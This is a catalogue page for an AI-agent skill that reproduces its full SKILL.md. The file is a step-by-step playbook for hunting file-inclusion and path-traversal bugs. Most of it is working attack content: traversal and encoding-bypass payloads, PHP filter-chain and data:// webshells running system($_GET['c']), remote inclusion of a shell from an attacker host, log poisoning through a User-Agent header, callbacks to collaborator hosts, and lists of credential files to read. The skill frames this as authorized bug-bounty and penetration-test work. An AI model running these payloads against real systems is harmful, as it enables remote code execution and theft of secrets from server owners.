Agent skill

Hunt Lfi

by sickn33 in sickn33/agentic-awesome-skills

Hunt Local File Inclusion (LFI), Remote File Inclusion (RFI), and Path Traversal

MITAuto-check: warnings

Install Hunt Lfi

The automated check flagged lines worth reading first. See the safety section below.

skills CLI
$ npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install sickn33/agentic-awesome-skills hunt-lfi --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/sickn33/agentic-awesome-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt-lfi .claude/skills/hunt-lfi && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
hunt-lfi
GitHub stars
47k
Used in
1 other repo
Token cost
~4.7k tokens
SKILL.md length
1,650 words
Files
1
Skills in repo
1,497
Repo updated
First seen
Licence
MIT

At a glance

Hunt Local File Inclusion (LFI), Remote File Inclusion (RFI), and Path Traversal

  • Works in 9 steps: Identify Candidates → Path Traversal (read) → PHP Wrappers (source disclosure) → …
  • SKILL.md covers Crown Jewel Targets, OOB / Blind-LFI Confirmation…, Attack Surface Signals and Step-by-Step Methodology, plus 7 more sections
  • Calls curl and python3; reaches github.com; needs SECRET_KEY

What it does

Hunt Lfi is an agent skill from sickn33/agentic-awesome-skills. Hunt Local File Inclusion (LFI), Remote File Inclusion (RFI), and Path Traversal

Its SKILL.md is about 4.7k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts. Compatibility notes: Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not…

It works with PHP. The repository describes itself as: AAS Core is the local, agent-first control plane for complete catalog discovery, agent-owned selection, stack validation, and planning, backed by 2,400+ agentic skills. Includes… The licence is MIT.

Example prompts

  • “/hunt-lfi”

Requirements

  • Python 3
  • Node.js
  • A credential in SECRET_KEY
  • Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.

Workflow steps

9 steps, taken from the step headings in SKILL.md.

  1. Identify Candidates
  2. Path Traversal (read)
  3. PHP Wrappers (source disclosure)
  4. PHP Filter-Chain → RCE (no upload, no writable file)
  5. Code-Execution Wrappers (config prerequisites)
  6. Remote File Inclusion (RFI)
  7. Log Poisoning → RCE
  8. Session / Upload Poisoning
  9. Automation (then manual-confirm everything)

What it can do on your machine

Read from SKILL.md and the folder at commit b84d35a. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • curl
    • python3

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • github.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names these keys or tokens, usually read from environment variables:

    • SECRET_KEY

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

  • Compatibility

    Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.

    From compatibility in the SKILL.md frontmatter.

Context cost

Hunt Lfi loads about 4.7k tokens when it runs. Until then it costs about 22 tokens; SKILL.md has 1,650 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~22
When it runs · the whole SKILL.md, loaded when a task matches
~4.7k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: warnings

The automated check found patterns that need a careful read before installing.

  • NoteMentions a .env fileSKILL.md:37
    e-read is High when it exposes secrets (`.env`, `wp-config.php`, private keys, cloud creds), Medium when it only reads n
  • NoteMentions a .env fileSKILL.md:230
    /var/www/html/.env  /var/www/html/config.php  /var/www/html/wp-config.php
  • WarningMentions a credentials file (SSH keys, cloud or package-manager tokens)SKILL.md:231
    /home/*/.ssh/id_rsa  /root/.ssh/id_rsa  /root/.bash_history
  • WarningMentions a credentials file (SSH keys, cloud or package-manager tokens)SKILL.md:235
    /proc/self/environ  ~/.aws/credentials  ~/.docker/config.json  /run/secrets/*
  • NoteMentions a .env fileSKILL.md:264
    | File read | `.env` / `config.php` / `wp-config.php` | DB creds, API keys → backend takeover |
  • WarningMentions a credentials file (SSH keys, cloud or package-manager tokens)SKILL.md:265
    | File read | `/proc/self/environ`, `~/.aws/credentials` | env secrets, cloud keys → SSRF/IAM pivot |

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from sickn33/agentic-awesome-skills at commit b84d35a, republished under its MIT licence (© sickn33). 1,650 words, ~4,741 tokens.

Download SKILL.mdSave it as .claude/skills/hunt-lfi/SKILL.md (or your agent's skills folder).
name
hunt-lfi
description
Hunt Local File Inclusion (LFI), Remote File Inclusion (RFI), and Path Traversal
compatibility
Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled.
category
security
risk
offensive
source
https://github.com/elementalsouls/Claude-BugHunter
source_repo
elementalsouls/Claude-BugHunter
source_type
community
date_added
2026-09-20
license
MIT
license_source
https://github.com/elementalsouls/Claude-BugHunter/blob/main/LICENSE
sources
hackerone_public, synacktiv_research, portswigger_research
report_count
24

⚠️ AUTHORIZED USE ONLY This skill is for educational purposes or authorized security assessments only. You must have explicit, written permission from the system owner before using this tool. Misuse of this tool is illegal and strictly prohibited.

Mandatory confirmation gate Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target:

  1. Ask the user to state the exact target URL, IP, account, or resource.
  2. Ask the user to confirm written authorization and the permitted scope.
  3. Show the exact command(s) and explain their expected effect.
  4. Wait for explicit confirmation in the current conversation.

Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.

HUNT-LFI — Local / Remote File Inclusion & Path Traversal

Crown Jewel Targets

LFI that reaches code execution is Critical. Pure file-read is High when it exposes secrets (.env, wp-config.php, private keys, cloud creds), Medium when it only reads non-sensitive files.

Highest-value chains (in rough order of reliability in 2026):

  • PHP filter-chain → RCE — the modern default. A bare php://filter file-read primitive is upgraded to RCE with no upload endpoint and no writable file by chaining iconv conversions to forge an arbitrary PHP payload in-memory (Synacktiv, 2022). See the dedicated section below. This is the single most impactful thing to try and the most-missed.
  • Log poisoning → RCE — inject PHP into an Apache/Nginx log (User-Agent / URL path), then include the log. Increasingly blocked by open_basedir and unreadable log perms, so verify the log is readable first.
  • PHP wrappers → source disclosure — php://filter/convert.base64-encode/resource=index.php leaks source; read source to find more LFI sinks, secrets, and the include base path.
  • RFI → RCE — when allow_url_include=On, ?file=http://OOB/shell.txt pulls and executes remote code. Rare on modern configs but trivially Critical when present.
  • phar:// deserialization — a crafted PHAR + any unserialize-on-metadata sink → object-injection RCE.
  • zip:// / data:// chains and session/upload poisoning when filters block wrappers.

OOB / Blind-LFI Confirmation Gate (Read First)

LFI is frequently blind: the included content is parsed/executed but never reflected, or the page swallows the file into a template you can't see. Do not claim LFI from indirect signals alone.

What is NOT confirmation
  • A different status code or error string for ../../etc/passwd vs a normal value. The app may be string-matching ../ and returning a canned 403/500 without ever touching the filesystem.
  • Your input echoed back inside an error message (e.g. failed to open '/var/www/../../etc/passwd'). That is the path formatter, not proof the file was read. A genuine read shows file contents, not your path.
  • A page that "looks different." Reflected-input or WAF block pages produce diffs unrelated to a real read.
What IS confirmation
  • Direct read: actual file contents appear (real root:x:0:0: line, real PHP source after base64-decoding the filter output).
  • Blind read via OOB exfil: use a php://filter or XXE-style chain whose payload performs a DNS/HTTP callback to your Burp Collaborator subdomain, or use an expect:// / wrapper that triggers an outbound request. A unique-per-sink Collaborator hit (DNS + HTTP, with the server's source IP) proves the include ran.
  • Blind read via differential/timing: include a file you know exists and is large (/etc/passwd) vs one that does not (/etc/passwd_nope_<rand>). Stable, repeatable response-length or latency delta = real filesystem access. Confirm with a third known-good path to rule out coincidence.
Default workflow
  1. Pick a unique marker target: prefer a file whose content you can fingerprint exactly (/etc/passwd → grep ^root:). For blind, use a php://filter base64 read and decode — partial/truncated base64 still decodes to recognizable source.
  2. Generate a sub-tagged Collaborator payload per sink (lfi-page.<collab>, lfi-tpl.<collab>) so callbacks identify which parameter fired.
  3. Send, wait 30–120s, poll OOB.
  4. Claim LFI only after a content match, a Collaborator callback, or a stable triple-confirmed timing/length delta. Echoed paths and lone status-code changes are retracted.

Attack Surface Signals

URL / Body Parameters
?page=  ?file=  ?path=  ?template=  ?view=  ?lang=  ?module=
?include=  ?doc=  ?load=  ?read=  ?content=  ?theme=  ?layout=
?component=  ?download=  ?img=  ?pdf=  ?report=  ?style=  ?dir=
JSON bodies: {"filename":...} {"template":...} {"path":...}
Technology Stack Signals
SignalVector
PHP (X-Powered-By, .php, PHPSESSID)php:// filter-chain RCE, phar://, zip://, data://
Apache/Nginx logs readableLog poisoning → RCE (verify readability first)
Apache 2.4.49 / 2.4.50 (Server: banner)CVE-2021-41773 / CVE-2021-42013 traversal → RCE
PHP-CGI on Windows (XAMPP, php-cgi.exe)CVE-2024-4577 arg-injection → RCE
Java servlet (/WEB-INF/)WEB-INF/web.xml, classes/, application.properties
Python Flask/Django/proc/self/environ, settings.py, SECRET_KEY
Node.js file-serve / res.sendFile, express.staticpath-traversal read, require() traversal
Windows IIS / .NET..\..\web.config, C:\Windows\win.ini, machineKey

Step-by-Step Methodology

Phase 1 — Identify Candidates
bash
cat recon/$TARGET/urls.txt | gf lfi > recon/$TARGET/lfi-candidates.txt
grep -E "(\?|&)(page|file|path|template|view|lang|module|include|doc|load|read|content|download|img|pdf|report|dir)=" \
  recon/$TARGET/urls.txt
ffuf -u "https://$TARGET/FUZZ" -w ~/wordlists/lfi-paths.txt -mc 200,301,302
Phase 2 — Path Traversal (read)
bash
?file=../../../etc/passwd
?file=....//....//....//etc/passwd            # ../ stripping once → ....// survives
?file=..%2f..%2f..%2fetc%2fpasswd             # single URL-encode
?file=..%252f..%252f..%252fetc%252fpasswd     # double encode (decoded twice server-side)
?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd          # encode dots too
?file=/etc/passwd%00.png                      # null byte — PHP < 5.3.4 only
?file=....\/....\/etc\/passwd                  # mixed slash
# Prefix-forced base (app prepends /var/www/): pad with extra ../, or absolute path if no prefix
# UTF-8 overlong: %c0%ae%c0%ae%2f  (legacy servers)
bash
# Windows
?file=..\..\..\windows\win.ini
?file=..%5c..%5c..%5cwindows%5cwin.ini
?file=C:\inetpub\wwwroot\web.config
Phase 3 — PHP Wrappers (source disclosure)
bash
?file=php://filter/convert.base64-encode/resource=index.php   # decode base64 → source
?file=php://filter/read=string.rot13/resource=config.php
?file=php://filter/convert.base64-encode/resource=../app/Config.php
# Always base64-encode source reads: raw <?php ... ?> is parsed/swallowed and you see nothing.
Phase 4 — PHP Filter-Chain → RCE (no upload, no writable file)

The modern flagship technique (Synacktiv, 2022). If you have a php://-capable LFI that reads a file, you can also execute attacker-chosen PHP. iconv charset conversions, chained inside php://filter, emit controlled bytes that prepend to the resource until a full <?php ... ?> payload is forged — then include() runs it. No upload endpoint, no log access, no writable path required.

bash
# Generate the chain (public tool, no CVE — it abuses documented iconv behaviour):
#   git clone https://github.com/synacktiv/php_filter_chain_generator
python3 php_filter_chain_generator.py --chain '<?php system($_GET["c"]); ?>'
# Tool prints a long php://filter|convert.iconv.*|...|resource=php://temp string.
# Drop it into the sink:
?file=php://filter/convert.iconv.UTF8.CSISO2022KR|...<long-chain>...|convert.base64-decode/resource=php://temp&c=id

Notes / gotchas:

  • Requires the include sink to accept the php://filter scheme (most LFI sinks calling include/require/file_get_contents on the param do).
  • Payloads get long (10–50KB). If the param is length-capped or WAF-blocked on size, move it to a POST body, or use a minimal payload (<?=shorthand?>).
  • For blind targets, set the chain payload to a Collaborator callback (<?php file_get_contents("http://x.<collab>/".id);?>) to confirm execution OOB.
  • This works even when log poisoning fails (unreadable logs, open_basedir). Try it whenever you have a php:// filter read.
Phase 5 — Code-Execution Wrappers (config prerequisites)
bash
# data:// — executes inline; REQUIRES allow_url_include=On
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8+&c=id   # <?php system($_GET['c']);?>

# php://input — body is treated as the included resource; ALSO REQUIRES allow_url_include=On
#   POST ?file=php://input    body: <?php system($_GET['c']); ?>
#   (Same prerequisite as data://. Do NOT assume this works on default PHP config.)

# expect:// — direct command exec; requires the (rare) expect extension loaded
?file=expect://id
Phase 6 — Remote File Inclusion (RFI)

RFI = the include target is a remote URL. Prerequisite: allow_url_include=On (and allow_url_fopen=On). Off by default on modern PHP, but still seen on legacy/misconfigured hosts.

bash
# Host a payload you control, then:
?file=http://OOB-HOST/shell.txt          # shell.txt contains <?php system($_GET['c']); ?>
?file=https://OOB-HOST/shell.txt?
?file=ftp://OOB-HOST/shell.txt
# Detection without RCE: point at a Burp Collaborator HTTP URL. A callback (server IP) = the
# include fetched remotely → RFI confirmed even if execution is blocked. No callback = not RFI.
# Bypass appended extension (?file=$x.".php"): trailing ? or # to truncate, or ?file=http://OOB/shell
Phase 7 — Log Poisoning → RCE
bash
# Step 1: inject PHP into a log the include can read
curl -s "https://$TARGET/" -H "User-Agent: <?php system(\$_GET['c']); ?>"
# Step 2: include it (verify the log is readable first — read it plain before poisoning)
?file=../../../var/log/apache2/access.log&c=id
?file=../../../var/log/nginx/access.log&c=id
?file=/proc/self/fd/0&c=id                  # stdin fd (varies)
# Candidate logs: /var/log/apache2/access.log /var/log/httpd/access_log
#   /var/log/nginx/access.log /var/log/auth.log (SSH user poisoning) /proc/self/environ
Phase 8 — Session / Upload Poisoning
bash
# PHP session: set payload in a stored field (username/profile), then include the session file
?file=/var/lib/php/sessions/sess_<PHPSESSID>&c=id
?file=/tmp/sess_<PHPSESSID>&c=id
# phar:// object injection (needs an unserialize-on-metadata sink + any file upload):
?file=phar:///var/www/uploads/evil.jpg     # JPEG magic bytes prepended to a PHAR
# zip:// — archive containing the target, or a symlink to /etc/passwd
?file=zip:///var/www/uploads/a.zip%23path/inside.txt
Phase 8b — Archive-extraction & image-processing sinks (no ?file= needed)

Two LFI/traversal surfaces that are not query-parameter file reads:

  • Zip Slip / tar-symlink escape — a server that untars/unzips a user-supplied archive follows ../../ entry names or embedded symlinks (tar preserves them) to read/write outside the extraction dir. Craft an archive entry named ../../../etc/cron.d/x, or a symlink pointing at /etc/passwd; confirm by writing a unique canary outside the upload dir. Disclosed: reports/1439593, reports/733072, reports/822262.
  • ImageMagick coder read-sink — image convert/thumbnail/avatar features read local files via MSL/MVG coders even with no file parameter: filename/label label:@/etc/passwd, or an MSL payload (<image xlink:href="msl:/etc/passwd">) plus msl:/ephemeral: pseudo-protocols (ImageTragick CVE-2016-3714 family). Disclosed: reports/1858574. Pairs with hunt-file-upload.
Show full SKILL.md (640 more words)Show less
Phase 9 — Automation (then manual-confirm everything)
bash
ffuf -u "https://$TARGET/page.php?file=FUZZ" -w ~/wordlists/lfi.txt -mc all -fr "not found"
wfuzz -c -z file,/usr/share/wfuzz/wordlist/vulns/lfi.txt --hh <baseline-len> \
  "https://$TARGET/page.php?file=FUZZ"
dotdotpwn -m http -h $TARGET -o unix
# Burp: Intruder over the bypass table; Collaborator for blind/RFI confirmation.

Named CVEs / Public Techniques (grounding)

Verified, correctly-attributed references for the patterns above:

  • PHP filter-chain to RCE — Synacktiv research (2022); php_filter_chain_generator. Not a CVE; an abuse of documented iconv behaviour. The reason a bare file-read upgrades to Critical.
  • CVE-2021-41773 — Apache HTTP Server 2.4.49 path traversal (%2e in normalized path) → file read, and RCE when mod_cgi is enabled.
  • CVE-2021-42013 — Apache HTTP Server 2.4.50 incomplete fix for the above (double-encoded %%32%65) → traversal/RCE.
  • CVE-2024-4577 — PHP-CGI argument injection on Windows (Best-Fit encoding); reachable on XAMPP-style stacks, chains from file-serve to RCE.

Grounding note: this skill is built from 31 disclosed LFI/path-traversal reports. When citing a specific HackerOne report in your write-up, link the exact report URL/ID you used — do not paraphrase a report ID from memory. A wrong ID is worse than none.


Sensitive Files to Read

# Linux
/etc/passwd  /etc/hosts  /etc/shadow (rarely readable)
/proc/self/environ  /proc/self/cmdline  /proc/self/status
/var/www/html/.env  /var/www/html/config.php  /var/www/html/wp-config.php
/home/*/.ssh/id_rsa  /root/.ssh/id_rsa  /root/.bash_history
/var/www/html/app/config/parameters.yml   # Symfony
.git/config  .git/HEAD  composer.json  package.json
# App / cloud secrets
/proc/self/environ  ~/.aws/credentials  ~/.docker/config.json  /run/secrets/*
# Windows / .NET
C:\Windows\win.ini  C:\inetpub\wwwroot\web.config  ..\..\web.config
C:\Windows\System32\inetsrv\config\applicationHost.config

Bypass Table

FilterBypass
Strips ../ once....// or ..../\ (re-forms ../ after strip)
URL-decodes once%252f (double-encode /), %252e for dots
Decodes once, blocks ..Encode dots: %2e%2e%2f / overlong %c0%ae (legacy)
Appends .php to input? or # truncation; null byte %00 (PHP < 5.3.4)
Blocks php:// schemetry PHP://, pHp://, or data:// / expect://
Prepends fixed base direnough ../ to escape; or absolute path if no base prepend
Blocks /etc/passwd literalpath-truncation, /etc/./passwd, /etc//passwd
WAF on long filter-chainsmove chain to POST body / minimize payload
Windows..\..\..\windows\win.ini, ..%5c..%5c

Chain Table

LFI primitiveChain toImpact
php://filter readfilter-chain RCE (Phase 4)RCE with no upload — Critical
File read.env / config.php / wp-config.phpDB creds, API keys → backend takeover
File read/proc/self/environ, ~/.aws/credentialsenv secrets, cloud keys → SSRF/IAM pivot
Remote URL includeRFI (allow_url_include)direct RCE — Critical
File read + uploadphar:// / log / session poisonRCE — Critical
Source disclosurefull app sourcehardcoded secrets, new sinks, machineKey

Validation Discipline

Direct-read proof (not a false positive):

  • Show real contents, not your echoed path. /etc/passwd must contain a literal root:x:0:0:root:/root: line. Diff the response against a known-good param value — the delta must be the file body, not a WAF/error page.
  • For source reads, the base64 must decode to valid PHP. A garbage/empty decode = no real read.
  • Rule out reflection: confirm the marker text is not simply your input bounced back. Request /etc/passwd and /etc/passwd_<rand> (non-existent) — only the real file returns content.

Blind / OOB proof:

  • No reflection? Use a php://filter-chain or RFI payload that calls back to a unique Burp Collaborator subdomain. Require a DNS + HTTP hit with the server's source IP before claiming the include executed. Sub-tag per sink.
  • Timing/length blind: triple-confirm a stable delta (known-large file vs missing file vs second known file). One-off deltas are noise — retract.

Partial / truncated reads:

  • Templating may HTML-escape or cut the file. Use php://filter/convert.base64-encode so even a truncated read decodes to recognizable bytes; report exactly what you recovered, not what you assume is there.

RCE proof: show command output you control — id / whoami / hostname reflected, or an OOB callback from inside the executed payload (curl http://<collab>/). "The payload was accepted" is not RCE.

Severity:

  • Non-sensitive file read: Medium
  • File read exposing DB creds / API keys / private keys / cloud creds: High
  • RCE via filter-chain / RFI / log / session / phar / CVE: Critical

When to Use

  • You have explicit, written authorization to assess the target in scope, and the task matches this skill's vulnerability class or technique within a bug-bounty or penetration-test engagement.
  • You need the recon, exploitation, or validation workflow described below — executed strictly inside the approved scope.

Limitations

  • Authorized scope only: the confirmation gate above is mandatory before any probing, exploitation, or credential-access command.
  • Docs-only import: upstream helper scripts, commands, engine, and research assets are not bundled; reinstall tooling from the source repo when needed.
  • Validate every finding (see triage-validation) before reporting; report via report-writing. Prefer a sandbox, disposable VM, or controlled lab.
Example
bash
# Read-only first step; confirm scope before anything active.
cat scope.txt  # target list from the authorized engagement brief

Adapted from elementalsouls/Claude-BugHunter (MIT); frontmatter, When to Use/Limitations, and safety boundaries added for upstream compliance. Docs-only import: executable helpers, commands, engine, and research assets not bundled.

© sickn33, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/hunt-lfi of sickn33/agentic-awesome-skills.

Open the folder on GitHubat commit b84d35a

Used in 1 other repository

We found 5 copies of this SKILL.md (exact, near-identical or edited) in other folders, from 1 other GitHub owner. This page covers the copy in sickn33/agentic-awesome-skills, which our catalogue first saw on October 7, 2026.

Compare with similar skills

Hunt Lfi next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Hunt Lfi compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Hunt Lfi this skillsickn33/agentic-awesome-skills47k1 repos~4.7kAutomated safety check: WarnMIT
Configuring Horizoncoollabsio/coolify63k4 repos~898Automated safety check: PassMIT
Tailwindcss Developmentanonaddy/anonaddy4.9k10 repos~865Automated safety check: PassMIT
Fortify Developmentcoollabsio/coolify63k4 repos~1.9kAutomated safety check: PassMIT
MCP Developmentcoollabsio/coolify63k1 repos~949Automated safety check: PassMIT
WooCommerce Code Reviewwoocommerce/woocommerce11k3 repos~1.1kAutomated safety check: PassCustom licence

Similar skills

  • Configuring Horizon

    coollabsio/coolify

    A skill your agent uses whenever the user mentions Horizon by name in a Laravel context.

    63k GitHub starsUsed in 4 repos~898 tokens
    Backend & APIsAuto-check passed
  • Tailwindcss Development

    anonaddy/anonaddy

    Always invoke when the user's message includes 'tailwind' in any form.

    4.9k GitHub starsUsed in 10 repos~865 tokens
    Frontend & DesignAuto-check passed
  • Fortify Development

    coollabsio/coolify

    ACTIVATE when the user works on authentication in Laravel. An agent skill from coollabsio/coolify.

    63k GitHub starsUsed in 4 repos~1.9k tokens
    Backend & APIsAuto-check passed
  • MCP Development

    coollabsio/coolify

    A skill your agent uses for Laravel MCP development. An agent skill from coollabsio/coolify.

    63k GitHub starsUsed in 1 repo~949 tokens
    Frontend & DesignAuto-check passed
  • WooCommerce Code Review

    woocommerce/woocommerce

    Reviews WooCommerce code changes against the project's standards, flagging backend PHP architecture, naming, documentation, data integrity and testing violations.

    11k GitHub starsUsed in 3 repos~1.1k tokens
    DevelopmentAuto-check passed
  • Sync Translations

    symfony/symfony

    Synchronize translation catalogs across maintained Symfony branches: find messages that newer branches added to the English catalogs but that are still missing from the oldest maintained branch…

    31k GitHub stars~1.9k tokensUpdated yesterday
    Writing & ContentAuto-check passed

More from sickn33/agentic-awesome-skills

All 1,497 skills in this repo
  • Liuguang Banlan UI

    sickn33/agentic-awesome-skills

    Implements an interface in one of two named color modes, iridescent white or colorful black, from a parameterized starter that reports measured color intensity.

    47k GitHub starsUsed in 1 repo~2.5k tokens
    Auto-check passed
  • User Thoughts Memory

    sickn33/agentic-awesome-skills

    Saves a user's project decisions, rules and preferences into a project-local mdbase so later sessions and other agents can recover the intent.

    47k GitHub starsUsed in 1 repo~2.5k tokens
    Auto-check passed
  • Using LWC Memory and Graphs

    sickn33/agentic-awesome-skills

    Keeps project decisions, research and verified results available across coding-agent sessions through LWC memory, a document Wiki graph and a CodeGraph code index.

    47k GitHub starsUsed in 1 repo~2k tokens
    Auto-check passed
  • Find Complementary Founders

    sickn33/agentic-awesome-skills

    Guides an agent through assessing its own owner for cofounder fit, publishing an approved profile, and ranking complementary profiles other agents published for their owners.

    47k GitHub starsUsed in 1 repo~4.8k tokens
    Auto-check passed
  • Whatsapp Cloud API

    sickn33/agentic-awesome-skills

    Integracao com WhatsApp Business Cloud API (Meta). An agent skill from sickn33/agentic-awesome-skills.

    47k GitHub starsUsed in 2 repos~4.5k tokens
    Auto-check passed
  • Cline Pilot

    sickn33/agentic-awesome-skills

    Acts as a proxy for the Cline CLI, dispatching coding tasks one at a time, monitoring runs by hard evidence, relaying decisions to you and learning per-project preferences.

    47k GitHub starsUsed in 1 repo~4.6k tokens
    Auto-check passed

Works with

Questions about Hunt Lfi

What does Hunt Lfi do?

Hunt Local File Inclusion (LFI), Remote File Inclusion (RFI), and Path Traversal. Hunt Lfi is an agent skill from sickn33/agentic-awesome-skills.

How do I install Hunt Lfi in Claude Code?

Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a claude-code`. Or copy the skill folder (skills/hunt-lfi in sickn33/agentic-awesome-skills) into .claude/skills/hunt-lfi in your project. Claude Code loads it when a task matches its description.

How do I install Hunt Lfi in Codex?

Run `npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a codex`. Or copy the skill folder (skills/hunt-lfi in sickn33/agentic-awesome-skills) into .agents/skills/hunt-lfi in your project. Codex loads it when a task matches its description.

Can I use Hunt Lfi in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add sickn33/agentic-awesome-skills --skill hunt-lfi -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-lfi, .gemini/skills/hunt-lfi, .github/skills/hunt-lfi and .opencode/skills/hunt-lfi in your project.

What does Hunt Lfi need to run?

Going by SKILL.md and its folder, Hunt Lfi needs the command-line tools its instructions call (curl and python3) and credentials named SECRET_KEY. Our summary lists: Python 3; Node.js; A credential in SECRET_KEY. Compatibility (from SKILL.md): Requires explicit written authorization for a target scope plus the relevant testing tools for this technique. Docs-only; helper scripts and commands not bundled..

Does Hunt Lfi access the network?

SKILL.md names 1 domain. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. This is read from the text; nothing was executed.

Is Hunt Lfi safe to install?

Our automated static check of SKILL.md flagged 3 warning(s): mentions a credentials file (ssh keys, cloud or package-manager tokens). Read the flagged lines before installing; the check is not a guarantee either way.

What licence does Hunt Lfi use?

Hunt Lfi is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Hunt Lfi use?

About 4.7k tokens (SKILL.md is roughly 19k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Hunt Lfi?

Skills that share tags, products or a category with Hunt Lfi: Configuring Horizon (coollabsio/coolify, 63k stars), Tailwindcss Development (anonaddy/anonaddy, 4.9k stars), Fortify Development (coollabsio/coolify, 63k stars) and MCP Development (coollabsio/coolify, 63k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Hunt Lfi?

sickn33 (a GitHub user) maintains it in sickn33/agentic-awesome-skills, which has 47,405 GitHub stars. The repository holds 1,497 skills in this directory. The repository was last updated on October 9, 2026.

Source: sickn33/agentic-awesome-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.